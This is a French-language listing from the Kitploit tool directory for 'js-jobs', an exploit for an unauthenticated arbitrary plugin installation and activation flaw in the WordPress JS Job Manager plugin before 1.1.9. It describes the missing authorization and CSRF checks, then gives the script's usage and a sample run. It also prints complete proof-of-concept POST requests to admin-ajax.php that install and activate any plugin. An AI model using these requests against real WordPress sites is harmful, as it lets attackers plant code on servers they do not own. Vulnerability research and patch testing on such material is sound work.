Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
js-jobs — JS Job Manager < 1.1.9 - Installation/Activation arbitraire de plugin sans authentification | Kitploit
Outils/GitHubGitHub/randomrobbiebf/js-jobs
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubrandomrobbiebf/js-jobs

js-jobs

JS Job Manager < 1.1.9 - Installation/Activation arbitraire de plugin sans authentification

Voir le dépôt
1il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

js-jobs

JS Job Manager < 1.1.9 - Installation/Activation arbitraire de plugin sans authentification

Description

L'action AJAX jsjobs_ajax du plugin, disponible pour les utilisateurs authentifiés comme non authentifiés, ne dispose pas de contrôles d'autorisation et de vérifications CSRF appropriés, en particulier lors de l'utilisation de installPluginFromAjax et activatePluginFromAjax, ce qui pourrait permettre à des attaquants non authentifiés d'installer des plugins arbitraires depuis le référentiel WordPress et de les activer (avec certaines limitations).

Il n'y a aucun contrôle sur la version du plugin, donc il installera la dernière version du plugin.

Comment utiliser

root@kitploit:~
usage: js-jobs.py [-h] --url URL --slug SLUG
js-jobs.py: error: the following arguments are required: --url/-u, --slug/-s

Exemple

root@kitploit:~
$ python3 js-jobs.py --url http://192.168.1.131:5555 -s woocommerce
Plugin has been Downloaded.
Plugin has been downloaded and is on the server.
Plugin has been activated / activated.

Preuve de concept

Pour installer un plugin :

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 90
Connection: close

action=jsjobs_ajax&task=installPluginFromAjax&jsjobsme=jsjobs&pluginslug=<slug>

Pour activer un plugin (il y a une limitation ici, car le plugin doit avoir le fichier /.php, sinon il ne sera pas activé) :

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 78
Connection: close

action=jsjobs_ajax&task=activatePluginFromAjax&jsjobsme=jsjobs&pluginslug=<slug> 
Télécharger l’outil